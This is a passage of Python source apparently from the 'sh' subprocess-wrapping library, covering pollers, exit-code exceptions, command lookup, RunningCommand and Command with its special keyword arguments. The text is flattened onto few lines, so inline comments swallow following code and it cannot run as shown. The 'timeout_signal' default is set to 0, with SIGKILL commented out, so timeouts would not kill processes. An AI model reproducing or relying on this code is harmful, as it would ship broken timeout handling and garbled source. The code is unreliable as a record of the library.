Poller(object): def __init__(self): self._poll = select.poll() # file descriptor <-> file object bidirectional maps self.fd_lookup = {} self.fo_lookup = {} def __nonzero__(self): return len(self.fd_lookup) != 0 def __len__(self): return len(self.fd_lookup) def _set_fileobject(self, f): if hasattr(f, "fileno"): fd = f.fileno() self.fd_lookup[fd] = f self.fo_lookup[f] = fd else: self.fd_lookup[f] = f self.fo_lookup[f] = f def _remove_fileobject(self, f): if hasattr(f, "fileno"): fd = f.fileno() del self.fd_lookup[fd] del self.fo_lookup[f] else: del self.fd_lookup[f] del self.fo_lookup[f] def _get_file_descriptor(self, f): return self.fo_lookup.get(f) def _get_file_object(self, fd): return self.fd_lookup.get(fd) def _register(self, f, events): # f can be a file descriptor or file object self._set_fileobject(f) fd = self._get_file_descriptor(f) self._poll.register(fd, events) def register_read(self, f): self._register(f, select.POLLIN | select.POLLPRI) def register_write(self, f): self._register(f, select.POLLOUT) def register_error(self, f): self._register(f, select.POLLERR | select.POLLHUP | select.POLLNVAL) def unregister(self, f): fd = self._get_file_descriptor(f) self._poll.unregister(fd) self._remove_fileobject(f) def poll(self, timeout): if timeout is not None: # convert from seconds to milliseconds timeout *= 1000 changes = self._poll.poll(timeout) results = [] for fd, events in changes: f = self._get_file_object(fd) if events & (select.POLLIN | select.POLLPRI): results.append((f, POLLER_EVENT_READ)) elif events & select.POLLOUT: results.append((f, POLLER_EVENT_WRITE)) elif events & select.POLLHUP: results.append((f, POLLER_EVENT_HUP)) elif events & (select.POLLERR | select.POLLNVAL): results.append((f, POLLER_EVENT_ERROR)) return results else: class Poller(object): def __init__(self): self.rlist = [] self.wlist = [] self.xlist = [] def 
__nonzero__(self): return len(self.rlist) + len(self.wlist) + len(self.xlist) != 0 def __len__(self): return len(self.rlist) + len(self.wlist) + len(self.xlist) @staticmethod def _register(f, events): if f not in events: events.append(f) @staticmethod def _unregister(f, events): if f in events: events.remove(f) def register_read(self, f): self._register(f, self.rlist) def register_write(self, f): self._register(f, self.wlist) def register_error(self, f): self._register(f, self.xlist) def unregister(self, f): self._unregister(f, self.rlist) self._unregister(f, self.wlist) self._unregister(f, self.xlist) def poll(self, timeout): _in, _out, _err = select.select(self.rlist, self.wlist, self.xlist, timeout) results = [] for f in _in: results.append((f, POLLER_EVENT_READ)) for f in _out: results.append((f, POLLER_EVENT_WRITE)) for f in _err: results.append((f, POLLER_EVENT_ERROR)) return results def encode_to_py3bytes_or_py2str(s): """ takes anything and attempts to return a py2 string or py3 bytes. this is typically used when creating command + arguments to be executed via os.exec* """ fallback_encoding = "utf8" if IS_PY3: # if we're already bytes, do nothing if isinstance(s, bytes): pass else: s = str(s) try: s = bytes(s, DEFAULT_ENCODING) except UnicodeEncodeError: s = bytes(s, fallback_encoding) else: # attempt to convert the thing to unicode from the system's encoding try: s = unicode(s, DEFAULT_ENCODING) # if the thing is already unicode, or it's a number, it can't be # coerced to unicode with an encoding argument, but if we leave out # the encoding argument, it will convert it to a string, then to unicode except TypeError: s = unicode(s) # now that we have guaranteed unicode, encode to our system encoding, # but attempt to fall back to something try: s = s.encode(DEFAULT_ENCODING) except UnicodeEncodeError: s = s.encode(fallback_encoding, "replace") return s def _indent_text(text, num=4): lines = [] for line in text.split("\n"): line = (" " * num) + line lines.append(line) return "\n".join(lines) class ForkException(Exception): def __init__(self, orig_exc): tmpl = """ Original exception: =================== %s """ msg = tmpl % _indent_text(orig_exc) Exception.__init__(self, msg) class ErrorReturnCodeMeta(type): """ a metaclass which provides the ability for an ErrorReturnCode (or derived) instance, imported from one sh module, to be considered the subclass of ErrorReturnCode from another module. this is mostly necessary in the tests, where we do assertRaises, but the ErrorReturnCode that the program we're testing throws may not be the same class that we pass to assertRaises """ def __subclasscheck__(self, o): other_bases = set([b.__name__ for b in o.__bases__]) return self.__name__ in other_bases or o.__name__ == self.__name__ class ErrorReturnCode(Exception): __metaclass__ = ErrorReturnCodeMeta """ base class for all exceptions as a result of a command's exit status being deemed an error. this base class is dynamically subclassed into derived classes with the format: ErrorReturnCode_NNN where NNN is the exit code number. 
the reason for this is it reduces boiler plate code when testing error return codes: try: some_cmd() except ErrorReturnCode_12: print("couldn't do X") vs: try: some_cmd() except ErrorReturnCode as e: if e.exit_code == 12: print("couldn't do X") it's not much of a savings, but i believe it makes the code easier to read """ truncate_cap = 750 def __reduce__(self): return self.__class__, (self.full_cmd, self.stdout, self.stderr, self.truncate) def __init__(self, full_cmd, stdout, stderr, truncate=True): self.full_cmd = full_cmd self.stdout = stdout self.stderr = stderr self.truncate = truncate exc_stdout = self.stdout if truncate: exc_stdout = exc_stdout[:self.truncate_cap] out_delta = len(self.stdout) - len(exc_stdout) if out_delta: exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode() exc_stderr = self.stderr if truncate: exc_stderr = exc_stderr[:self.truncate_cap] err_delta = len(self.stderr) - len(exc_stderr) if err_delta: exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode() msg_tmpl = unicode("\n\n RAN: {cmd}\n\n STDOUT:\n{stdout}\n\n STDERR:\n{stderr}") msg = msg_tmpl.format( cmd=self.full_cmd, stdout=exc_stdout.decode(DEFAULT_ENCODING, "replace"), stderr=exc_stderr.decode(DEFAULT_ENCODING, "replace") ) if not IS_PY3: # Exception messages should be treated as an API which takes native str type on both # Python2 and Python3. (Meaning, it's a byte string on Python2 and a text string on # Python3) msg = encode_to_py3bytes_or_py2str(msg) super(ErrorReturnCode, self).__init__(msg) class SignalException(ErrorReturnCode): pass class TimeoutException(Exception): """ the exception thrown when a command is killed because a specified timeout (via _timeout or .wait(timeout)) was hit """ def __init__(self, exit_code, full_cmd): self.exit_code = exit_code self.full_cmd = full_cmd super(Exception, self).__init__() try: SIGNALS_THAT_SHOULD_THROW_EXCEPTION = set(( signal.SIGABRT, signal.SIGBUS, signal.SIGFPE, signal.SIGILL, signal.SIGINT, signal.SIGKILL, signal.SIGPIPE, signal.SIGQUIT, signal.SIGSEGV, signal.SIGTERM, signal.SIGSYS, )) except: pass # we subclass AttributeError because: # https://github.com/ipython/ipython/issues/2577 # https://github.com/amoffat/sh/issues/97#issuecomment-10610629 class CommandNotFound(AttributeError): pass rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG[a-zA-Z]+)") rc_exc_cache = {} SIGNAL_MAPPING = dict([(v, k) for k, v in signal.__dict__.items() if re.match(r"SIG[a-zA-Z]+", k)]) def get_exc_from_name(name): """ takes an exception name, like: ErrorReturnCode_1 SignalException_9 SignalException_SIGHUP and returns the corresponding exception. this is primarily used for importing exceptions from sh into user code, for instance, to capture those exceptions """ exc = None try: return rc_exc_cache[name] except KeyError: m = rc_exc_regex.match(name) if m: base = m.group(1) rc_or_sig_name = m.group(2) if base == "SignalException": try: rc = -int(rc_or_sig_name) except ValueError: rc = -getattr(signal, rc_or_sig_name) else: rc = int(rc_or_sig_name) exc = get_rc_exc(rc) return exc def get_rc_exc(rc): """ takes a exit code or negative signal number and produces an exception that corresponds to that return code. 
positive return codes yield ErrorReturnCode exception, negative return codes yield SignalException we also cache the generated exception so that only one signal of that type exists, preserving identity """ try: return rc_exc_cache[rc] except KeyError: pass if rc >= 0: name = "ErrorReturnCode_%d" % rc base = ErrorReturnCode else: signame = SIGNAL_MAPPING[abs(rc)] name = "SignalException_" + signame base = SignalException exc = ErrorReturnCodeMeta(name, (base,), {"exit_code": rc}) rc_exc_cache[rc] = exc return exc # we monkey patch glob. i'm normally generally against monkey patching, but i # decided to do this really un-intrusive patch because we need a way to detect # if a list that we pass into an sh command was generated from glob. the reason # being that glob returns an empty list if a pattern is not found, and so # commands will treat the empty list as no arguments, which can be a problem, # ie: # # ls(glob("*.ojfawe")) # # ^ will show the contents of your home directory, because it's essentially # running ls([]) which, as a process, is just "ls". # # so we subclass list and monkey patch the glob function. nobody should be the # wiser, but we'll have results that we can make some determinations on _old_glob = glob_module.glob class GlobResults(list): def __init__(self, path, results): self.path = path list.__init__(self, results) def glob(path, *args, **kwargs): expanded = GlobResults(path, _old_glob(path, *args, **kwargs)) return expanded glob_module.glob = glob def canonicalize(path): return os.path.abspath(os.path.expanduser(path)) def which(program, paths=None): """ takes a program name or full path, plus an optional collection of search paths, and returns the full path of the requested executable. if paths is specified, it is the entire list of search paths, and the PATH env is not used at all. otherwise, PATH env is used to look for the program """ def is_exe(file_path): return (os.path.exists(file_path) and os.access(file_path, os.X_OK) and os.path.isfile(os.path.realpath(file_path))) found_path = None fpath, fname = os.path.split(program) # if there's a path component, then we've specified a path to the program, # and we should just test if that program is executable. if it is, return if fpath: program = canonicalize(program) if is_exe(program): found_path = program # otherwise, we've just passed in the program name, and we need to search # the paths to find where it actually lives else: paths_to_search = [] if isinstance(paths, (tuple, list)): paths_to_search.extend(paths) else: env_paths = os.environ.get("PATH", "").split(os.pathsep) paths_to_search.extend(env_paths) for path in paths_to_search: exe_file = os.path.join(canonicalize(path), program) if is_exe(exe_file): found_path = exe_file break return found_path def resolve_command_path(program): path = which(program) if not path: # our actual command might have a dash in it, but we can't call # that from python (we have to use underscores), so we'll check # if a dash version of our underscore command exists and use that # if it does if "_" in program: path = which(program.replace("_", "-")) if not path: return None return path def resolve_command(name, baked_args=None): path = resolve_command_path(name) cmd = None if path: cmd = Command(path) if baked_args: cmd = cmd.bake(**baked_args) return cmd class Logger(object): """ provides a memory-inexpensive logger. a gotcha about python's builtin logger is that logger objects are never garbage collected. 
if you create a thousand loggers with unique names, they'll sit there in memory until your script is done. with sh, it's easy to create loggers with unique names if we want our loggers to include our command arguments. for example, these are all unique loggers: ls -l ls -l /tmp ls /tmp so instead of creating unique loggers, and without sacrificing logging output, we use this class, which maintains as part of its state, the logging "context", which will be the very unique name. this allows us to get a logger with a very general name, eg: "command", and have a unique name appended to it via the context, eg: "ls -l /tmp" """ def __init__(self, name, context=None): self.name = name self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name)) self.context = self.sanitize_context(context) def _format_msg(self, msg, *a): if self.context: msg = "%s: %s" % (self.context, msg) return msg % a @staticmethod def sanitize_context(context): if context: context = context.replace("%", "%%") return context or "" def get_child(self, name, context): new_name = self.name + "." + name new_context = self.context + "." + context return Logger(new_name, new_context) def info(self, msg, *a): self.log.info(self._format_msg(msg, *a)) def debug(self, msg, *a): self.log.debug(self._format_msg(msg, *a)) def error(self, msg, *a): self.log.error(self._format_msg(msg, *a)) def exception(self, msg, *a): self.log.exception(self._format_msg(msg, *a)) def default_logger_str(cmd, call_args, pid=None): if pid: s = "<Command %r, pid %d>" % (cmd, pid) else: s = "<Command %r>" % cmd return s class RunningCommand(object): """ this represents an executing Command object. it is returned as the result of __call__() being executed on a Command instance. this creates a reference to a OProc instance, which is a low-level wrapper around the process that was exec'd this is the class that gets manipulated the most by user code, and so it implements various convenience methods and logical mechanisms for the underlying process. for example, if a user tries to access a backgrounded-process's stdout/err, the RunningCommand object is smart enough to know to wait() on the process to finish first. and when the process finishes, RunningCommand is smart enough to translate exit codes to exceptions. """ # these are attributes that we allow to pass through to OProc _OProc_attr_whitelist = set(( "signal", "terminate", "kill", "kill_group", "signal_group", "pid", "sid", "pgid", "ctty", "input_thread_exc", "output_thread_exc", "bg_thread_exc", )) def __init__(self, cmd, call_args, stdin, stdout, stderr): """ cmd is a list, where each element is encoded as bytes (PY3) or str (PY2) """ # self.ran is used for auditing what actually ran. for example, in # exceptions, or if you just want to know what was ran after the # command ran # # here we're making a consistent unicode string out if our cmd. # we're also assuming (correctly, i think) that the command and its # arguments are the encoding we pass into _encoding, which falls back to # the system's encoding enc = call_args["encoding"] self.ran = " ".join([shlex_quote(arg.decode(enc, "ignore")) for arg in cmd]) self.call_args = call_args self.cmd = cmd self.process = None self._waited_until_completion = False should_wait = True spawn_process = True # this is used to track if we've already raised StopIteration, and if we # have, raise it immediately again if the user tries to call next() on # us. 
https://github.com/amoffat/sh/issues/273 self._stopped_iteration = False # with contexts shouldn't run at all yet, they prepend # to every command in the context if call_args["with"]: spawn_process = False get_prepend_stack().append(self) if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]: should_wait = False # we're running in the background, return self and let us lazily # evaluate if call_args["bg"]: should_wait = False # redirection if call_args["err_to_out"]: stderr = OProc.STDOUT done_callback = call_args["done"] if done_callback: call_args["done"] = partial(done_callback, self) # set up which stream should write to the pipe # TODO, make pipe None by default and limit the size of the Queue # in oproc.OProc pipe = OProc.STDOUT if call_args["iter"] == "out" or call_args["iter"] is True: pipe = OProc.STDOUT elif call_args["iter"] == "err": pipe = OProc.STDERR if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True: pipe = OProc.STDOUT elif call_args["iter_noblock"] == "err": pipe = OProc.STDERR # there's currently only one case where we wouldn't spawn a child # process, and that's if we're using a with-context with our command self._spawned_and_waited = False if spawn_process: log_str_factory = call_args["log_msg"] or default_logger_str logger_str = log_str_factory(self.ran, call_args) self.log = Logger("command", logger_str) self.log.debug("starting process") if should_wait: self._spawned_and_waited = True # this lock is needed because of a race condition where a background # thread, created in the OProc constructor, may try to access # self.process, but it has not been assigned yet process_assign_lock = threading.Lock() with process_assign_lock: self.process = OProc(self, self.log, cmd, stdin, stdout, stderr, self.call_args, pipe, process_assign_lock) logger_str = log_str_factory(self.ran, call_args, self.process.pid) self.log.context = self.log.sanitize_context(logger_str) self.log.info("process started") if should_wait: self.wait() def wait(self, timeout=None): """ waits for the running command to finish. this is called on all running commands, eventually, except for ones that run in the background if timeout is a number, it is the number of seconds to wait for the process to resolve. otherwise block on wait. this function can raise a TimeoutException, either because of a `_timeout` on the command itself as it was launched, or because of a timeout passed into this method. """ if not self._waited_until_completion: # if we've been given a timeout, we need to poll is_alive() if timeout is not None: waited_for = 0 sleep_amt = 0.1 alive = False exit_code = None if timeout < 0: raise RuntimeError("timeout cannot be negative") # while we still have time to wait, run this loop # notice that alive and exit_code are only defined in this loop, but the loop is also guaranteed to run, # defining them, given the constraints that timeout is non-negative while waited_for <= timeout: alive, exit_code = self.process.is_alive() # if we're alive, we need to wait some more, but let's sleep before we poll again if alive: time.sleep(sleep_amt) waited_for += sleep_amt # but if we're not alive, we're done waiting else: break # if we've made it this far, and we're still alive, then it means we timed out waiting if alive: raise TimeoutException(None, self.ran) # if we didn't time out, we fall through and let the rest of the code handle exit_code. # notice that we set _waited_until_completion here, only if we didn't time out. 
this allows us to # re-wait again on timeout, if we catch the TimeoutException in the parent frame self._waited_until_completion = True else: exit_code = self.process.wait() self._waited_until_completion = True if self.process.timed_out: # if we timed out, our exit code represents a signal, which is # negative, so let's make it positive to store in our # TimeoutException raise TimeoutException(-exit_code, self.ran) else: self.handle_command_exit_code(exit_code) # if an iterable command is using an instance of OProc for its stdin, # wait on it. the process is probably set to "piped", which means it # won't be waited on, which means exceptions won't propagate up to the # main thread. this allows them to bubble up if self.process._stdin_process: self.process._stdin_process.command.wait() self.log.debug("process completed") return self def is_alive(self): """ returns whether or not we're still alive. this call has side-effects on OProc """ return self.process.is_alive()[0] def handle_command_exit_code(self, code): """ here we determine if we had an exception, or an error code that we weren't expecting to see. if we did, we create and raise an exception """ ca = self.call_args exc_class = get_exc_exit_code_would_raise(code, ca["ok_code"], ca["piped"]) if exc_class: exc = exc_class(self.ran, self.process.stdout, self.process.stderr, ca["truncate_exc"]) raise exc @property def stdout(self): self.wait() return self.process.stdout @property def stderr(self): self.wait() return self.process.stderr @property def exit_code(self): self.wait() return self.process.exit_code def __len__(self): return len(str(self)) def __enter__(self): """ we don't actually do anything here because anything that should have been done would have been done in the Command.__call__ call. essentially all that has to happen is the command be pushed on the prepend stack. """ pass def __iter__(self): return self def next(self): """ allow us to iterate over the output of our command """ if self._stopped_iteration: raise StopIteration() # we do this because if get blocks, we can't catch a KeyboardInterrupt # so the slight timeout allows for that. while True: try: chunk = self.process._pipe_queue.get(True, self.call_args["iter_poll_time"]) except Empty: if self.call_args["iter_noblock"]: return errno.EWOULDBLOCK else: if chunk is None: self.wait() self._stopped_iteration = True raise StopIteration() try: return chunk.decode(self.call_args["encoding"], self.call_args["decode_errors"]) except UnicodeDecodeError: return chunk # python 3 __next__ = next def __exit__(self, exc_type, exc_val, exc_tb): if self.call_args["with"] and get_prepend_stack(): get_prepend_stack().pop() def __str__(self): """ in python3, should return unicode. in python2, should return a string of bytes """ if IS_PY3: return self.__unicode__() else: return unicode(self).encode(self.call_args["encoding"]) def __unicode__(self): """ a magic method defined for python2. 
calling unicode() on a RunningCommand object will call this """ if self.process and self.stdout: return self.stdout.decode(self.call_args["encoding"], self.call_args["decode_errors"]) elif IS_PY3: return "" else: return unicode("") def __eq__(self, other): return unicode(self) == unicode(other) __hash__ = None # Avoid DeprecationWarning in Python < 3 def __contains__(self, item): return item in str(self) def __getattr__(self, p): # let these three attributes pass through to the OProc object if p in self._OProc_attr_whitelist: if self.process: return getattr(self.process, p) else: raise AttributeError # see if strings have what we're looking for. we're looking at the # method names explicitly because we don't want to evaluate self unless # we absolutely have to, the reason being, in python2, hasattr swallows # exceptions, and if we try to run hasattr on a command that failed and # is being run with _iter=True, the command will be evaluated, throw an # exception, but hasattr will discard it if p in _unicode_methods: return getattr(unicode(self), p) raise AttributeError def __repr__(self): """ in python3, should return unicode. in python2, should return a string of bytes """ try: return str(self) except UnicodeDecodeError: if self.process: if self.stdout: return repr(self.stdout) return repr("") def __long__(self): return long(str(self).strip()) def __float__(self): return float(str(self).strip()) def __int__(self): return int(str(self).strip()) def output_redirect_is_filename(out): return isinstance(out, basestring) def get_prepend_stack(): tl = Command.thread_local if not hasattr(tl, "_prepend_stack"): tl._prepend_stack = [] return tl._prepend_stack def special_kwarg_validator(passed_kwargs, merged_kwargs, invalid_list): s1 = set(passed_kwargs.keys()) invalid_args = [] for elem in invalid_list: if callable(elem): fn = elem ret = fn(passed_kwargs, merged_kwargs) invalid_args.extend(ret) else: elem, error_msg = elem if s1.issuperset(elem): invalid_args.append((elem, error_msg)) return invalid_args def get_fileno(ob): # in py2, this will return None. in py3, it will return an method that # raises when called fileno_meth = getattr(ob, "fileno", None) fileno = None if fileno_meth: # py3 StringIO objects will report a fileno, but calling it will raise # an exception try: fileno = fileno_meth() except UnsupportedOperation: pass elif isinstance(ob, (int, long)) and ob >= 0: fileno = ob return fileno def ob_is_fd_based(ob): return get_fileno(ob) is not None def ob_is_tty(ob): """ checks if an object (like a file-like object) is a tty. 
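#
# A small sketch of the string-like behavior given by __str__/__contains__/__getattr__/
# __int__ above (file names are hypothetical):
#
#   import sh
#
#   out = sh.wc("-l", "setup.py")
#   "setup.py" in out                 # __contains__ -> substring test on the output
#   count = int(out.split()[0])       # str methods like split() are proxied via __getattr__
#   total = int(sh.cat("count.txt"))  # __int__ strips and converts the whole output
#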
""" fileno = get_fileno(ob) is_tty = False if fileno is not None: is_tty = os.isatty(fileno) return is_tty def ob_is_pipe(ob): fileno = get_fileno(ob) is_pipe = False if fileno: fd_stat = os.fstat(fileno) is_pipe = stat.S_ISFIFO(fd_stat.st_mode) return is_pipe def tty_in_validator(passed_kwargs, merged_kwargs): # here we'll validate that people aren't randomly shotgun-debugging different tty options and hoping that they'll # work, without understanding what they do pairs = (("tty_in", "in"), ("tty_out", "out")) invalid = [] for tty_type, std in pairs: if tty_type in passed_kwargs and ob_is_tty(passed_kwargs.get(std, None)): error = "`_%s` is a TTY already, so so it doesn't make sense to set up a TTY with `_%s`" % (std, tty_type) invalid.append(((tty_type, std), error)) # if unify_ttys is set, then both tty_in and tty_out must both be True if merged_kwargs["unify_ttys"] and not (merged_kwargs["tty_in"] and merged_kwargs["tty_out"]): invalid.append(( ("unify_ttys", "tty_in", "tty_out"), "`_tty_in` and `_tty_out` must both be True if `_unify_ttys` is True" )) return invalid def fg_validator(passed_kwargs, merged_kwargs): """ fg is not valid with basically every other option """ invalid = [] msg = """\ _fg is invalid with nearly every other option, see warning and workaround here: https://amoffat.github.io/sh/sections/special_arguments.html#fg""" whitelist = set(("env", "fg", "cwd")) offending = set(passed_kwargs.keys()) - whitelist if "fg" in passed_kwargs and passed_kwargs["fg"] and offending: invalid.append(("fg", msg)) return invalid def bufsize_validator(passed_kwargs, merged_kwargs): """ a validator to prevent a user from saying that they want custom buffering when they're using an in/out object that will be os.dup'ed to the process, and has its own buffering. an example is a pipe or a tty. it doesn't make sense to tell them to have a custom buffering, since the os controls this. """ invalid = [] in_ob = passed_kwargs.get("in", None) out_ob = passed_kwargs.get("out", None) in_buf = passed_kwargs.get("in_bufsize", None) out_buf = passed_kwargs.get("out_bufsize", None) in_no_buf = ob_is_fd_based(in_ob) out_no_buf = ob_is_fd_based(out_ob) err = "Can't specify an {target} bufsize if the {target} target is a pipe or TTY" if in_no_buf and in_buf is not None: invalid.append((("in", "in_bufsize"), err.format(target="in"))) if out_no_buf and out_buf is not None: invalid.append((("out", "out_bufsize"), err.format(target="out"))) return invalid def env_validator(passed_kwargs, merged_kwargs): """ a validator to check that env is a dictionary and that all environment variable keys and values are strings. Otherwise, we would exit with a confusing exit code 255. """ invalid = [] env = passed_kwargs.get("env", None) if env is None: return invalid if not isinstance(env, Mapping): invalid.append(("env", "env must be dict-like. Got {!r}".format(env))) return invalid for k, v in passed_kwargs["env"].items(): if not isinstance(k, str): invalid.append(("env", "env key {!r} must be a str".format(k))) if not isinstance(v, str): invalid.append(("env", "value {!r} of env key {!r} must be a str".format(v, k))) return invalid class Command(object): """ represents an un-run system program, like "ls" or "cd". because it represents the program itself (and not a running instance of it), it should hold very little state. in fact, the only state it does hold is baked arguments. 
when a Command object is called, the result that is returned is a RunningCommand object, which represents the Command put into an execution state. """ thread_local = threading.local() _call_args = { "fg": False, # run command in foreground # run a command in the background. commands run in the background # ignore SIGHUP and do not automatically exit when the parent process # ends "bg": False, # automatically report exceptions for background commands "bg_exc": True, "with": False, # prepend the command to every command after it "in": None, "out": None, # redirect STDOUT "err": None, # redirect STDERR "err_to_out": None, # redirect STDERR to STDOUT # stdin buffer size # 1 for line, 0 for unbuffered, any other number for that amount "in_bufsize": 0, # stdout buffer size, same values as above "out_bufsize": 1, "err_bufsize": 1, # this is how big the output buffers will be for stdout and stderr. # this is essentially how much output they will store from the process. # we use a deque, so if it overflows past this amount, the first items # get pushed off as each new item gets added. # # NOTICE # this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if # you're buffering out/err at 1024 bytes, the internal buffer size will # be "internal_bufsize" CHUNKS of 1024 bytes "internal_bufsize": 3 * 1024 ** 2, "env": None, "piped": None, "iter": None, "iter_noblock": None, # the amount of time to sleep between polling for the iter output queue "iter_poll_time": 0.1, "ok_code": 0, "cwd": None, # the separator delimiting between a long-argument's name and its value # setting this to None will cause name and value to be two separate # arguments, like for short options # for example, --arg=derp, '=' is the long_sep "long_sep": "=", # the prefix used for long arguments "long_prefix": "--", # this is for programs that expect their input to be from a terminal. # ssh is one of those programs "tty_in": False, "tty_out": True, "unify_ttys": False, "encoding": DEFAULT_ENCODING, "decode_errors": "strict", # how long the process should run before it is auto-killed "timeout": None, "timeout_signal": 0 , # signal.SIGKILL, # TODO write some docs on "long-running processes" # these control whether or not stdout/err will get aggregated together # as the process runs. this has memory usage implications, so sometimes # with long-running processes with a lot of data, it makes sense to # set these to true "no_out": False, "no_err": False, "no_pipe": False, # if any redirection is used for stdout or stderr, internal buffering # of that data is not stored. this forces it to be stored, as if # the output is being T'd to both the redirected destination and our # internal buffers "tee": None, # will be called when a process terminates regardless of exception "done": None, # a tuple (rows, columns) of the desired size of both the stdout and # stdin ttys, if ttys are being used "tty_size": (20, 80), # whether or not our exceptions should be truncated "truncate_exc": True, # a function to call after the child forks but before the process execs "preexec_fn": None, # UID to set after forking. Requires root privileges. Not supported on # Windows. "uid": None, # put the forked process in its own process session? "new_session": True, # pre-process args passed into __call__. only really useful when used # in .bake() "arg_preprocess": None, # a callable that produces a log message from an argument tuple of the # command and the args "log_msg": None, # whether or not to close all inherited fds. 
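#
# A sketch combining several of the special kwargs documented in _call_args above
# (paths, codes and timings are made up):
#
#   import signal, sh
#
#   sh.rsync("-a", "src/", "dst/",
#            _cwd="/tmp",                   # working directory for the child
#            _ok_code=[0, 24],              # exit codes treated as success
#            _timeout=60,                   # auto-kill after 60 seconds
#            _timeout_signal=signal.SIGTERM,
#            _err_to_out=True,              # fold stderr into stdout
#            _out="/tmp/rsync.log")         # a plain string is opened as a file
#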
typically, this should be True, as inheriting fds can be a security # vulnerability "close_fds": True, # a whitelist of the integer fds to pass through to the child process. setting this forces close_fds to be True "pass_fds": set(), } # this is a collection of validators to make sure the special kwargs make # sense _kwarg_validators = ( (("err", "err_to_out"), "Stderr is already being redirected"), (("piped", "iter"), "You cannot iterate when this command is being piped"), (("piped", "no_pipe"), "Using a pipe doesn't make sense if you've disabled the pipe"), (("no_out", "iter"), "You cannot iterate over output if there is no output"), (("close_fds", "pass_fds"), "Passing `pass_fds` forces `close_fds` to be True"), tty_in_validator, bufsize_validator, env_validator, fg_validator, ) def __init__(self, path, search_paths=None): found = which(path, search_paths) self._path = encode_to_py3bytes_or_py2str("") # is the command baked (aka, partially applied)? self._partial = False self._partial_baked_args = [] self._partial_call_args = {} # bugfix for functools.wraps. issue #121 self.__name__ = str(self) if not found: raise CommandNotFound(path) # the reason why we set the values early in the constructor, and again # here, is for people who have tools that inspect the stack on # exception. if CommandNotFound is raised, we need self._path and the # other attributes to be set correctly, so repr() works when they're # inspecting the stack. issue #304 self._path = encode_to_py3bytes_or_py2str(found) self.__name__ = str(self) def __getattribute__(self, name): # convenience get_attr = partial(object.__getattribute__, self) val = None if name.startswith("_"): val = get_attr(name) elif name == "bake": val = get_attr("bake") # here we have a way of getting past shadowed subcommands. for example, # if "git bake" was a thing, we wouldn't be able to do `git.bake()` # because `.bake()` is already a method. 
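#
# A sketch of constructing Command objects directly, per __init__ above (the missing
# program name is made up):
#
#   import sh
#
#   try:
#       sh.Command("definitely-not-installed")
#   except sh.CommandNotFound:
#       pass
#
#   python = sh.Command("/usr/bin/python3")   # absolute paths resolve too
#   python("--version")
#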
so we allow `git.bake_()` elif name.endswith("_"): name = name[:-1] if val is None: val = get_attr("bake")(name) return val @staticmethod def _extract_call_args(kwargs): """ takes kwargs that were passed to a command's __call__ and extracts out the special keyword arguments, we return a tuple of special keyword args, and kwargs that will go to the exec'ed command """ kwargs = kwargs.copy() call_args = {} for parg, default in Command._call_args.items(): key = "_" + parg if key in kwargs: call_args[parg] = kwargs[key] del kwargs[key] merged_args = Command._call_args.copy() merged_args.update(call_args) invalid_kwargs = special_kwarg_validator(call_args, merged_args, Command._kwarg_validators) if invalid_kwargs: exc_msg = [] for kwarg, error_msg in invalid_kwargs: exc_msg.append(" %r: %s" % (kwarg, error_msg)) exc_msg = "\n".join(exc_msg) raise TypeError("Invalid special arguments:\n\n%s\n" % exc_msg) return call_args, kwargs # TODO needs documentation def bake(self, *args, **kwargs): fn = type(self)(self._path) fn._partial = True call_args, kwargs = self._extract_call_args(kwargs) pruned_call_args = call_args for k, v in Command._call_args.items(): try: if pruned_call_args[k] == v: del pruned_call_args[k] except KeyError: continue fn._partial_call_args.update(self._partial_call_args) fn._partial_call_args.update(pruned_call_args) fn._partial_baked_args.extend(self._partial_baked_args) sep = pruned_call_args.get("long_sep", self._call_args["long_sep"]) prefix = pruned_call_args.get("long_prefix", self._call_args["long_prefix"]) fn._partial_baked_args.extend(compile_args(args, kwargs, sep, prefix)) return fn def __str__(self): """ in python3, should return unicode. in python2, should return a string of bytes """ if IS_PY3: return self.__unicode__() else: return self.__unicode__().encode(DEFAULT_ENCODING) def __eq__(self, other): return str(self) == str(other) __hash__ = None # Avoid DeprecationWarning in Python < 3 def __repr__(self): """ in python3, should return unicode. in python2, should return a string of bytes """ return "<Command %r>" % str(self) def __unicode__(self): """ a magic method defined for python2. calling unicode() on a self will call this """ baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args) if baked_args: baked_args = " " + baked_args return self._path.decode(DEFAULT_ENCODING) + baked_args def __enter__(self): self(_with=True) def __exit__(self, exc_type, exc_val, exc_tb): get_prepend_stack().pop() def __call__(self, *args, **kwargs): kwargs = kwargs.copy() args = list(args) # this will hold our final command, including arguments, that will be # exec'ed cmd = [] # this will hold a complete mapping of all our special keyword arguments # and their values call_args = Command._call_args.copy() # aggregate any 'with' contexts for prepend in get_prepend_stack(): pcall_args = prepend.call_args.copy() # don't pass the 'with' call arg pcall_args.pop("with", None) call_args.update(pcall_args) cmd.extend(prepend.cmd) cmd.append(self._path) # do we have an argument pre-processor? if so, run it. we need to do # this early, so that args, kwargs are accurate preprocessor = self._partial_call_args.get("arg_preprocess", None) if preprocessor: args, kwargs = preprocessor(args, kwargs) # here we extract the special kwargs and override any # special kwargs from the possibly baked command extracted_call_args, kwargs = self._extract_call_args(kwargs) call_args.update(self._partial_call_args) call_args.update(extracted_call_args) # handle a None. 
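#
# A sketch of bake() as implemented above: positional args and special kwargs are
# frozen into a new Command (host and port are made up):
#
#   import sh
#
#   ssh = sh.ssh.bake("-p", 2222)
#   ssh("user@host", "uptime")               # runs: ssh -p 2222 user@host uptime
#
#   ls_tmp = sh.ls.bake("-l", _cwd="/tmp")   # special kwargs can be baked as well
#   print(ls_tmp())
#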
